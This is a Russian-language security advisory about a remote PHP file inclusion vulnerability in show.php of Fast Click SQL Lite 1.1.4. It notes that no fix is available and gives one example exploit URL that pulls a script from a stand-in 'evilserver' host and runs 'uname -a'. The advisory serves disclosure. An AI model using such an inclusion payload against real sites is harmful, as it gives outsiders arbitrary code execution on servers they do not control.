PHP-инклюдинг в Fast Click SQL Lite

Дата публикации:
08.05.2006
Дата изменения:
21.10.2008
Всего просмотров:
1822
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Fast Click SQL Lite 1.x
Уязвимые версии: Fast Click SQL Lite 1.1.4, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "path" в сценарии show.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://[target].com/[path]/show.php?path=http://evilserver/cmd.gif?&cmd=uname -a

URL производителя: www.ftrain.siteburg.com/fclicksql.html

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Fast Click SQL Lite <= 1.1.3 Remote File Inclusion

или введите имя

CAPTCHA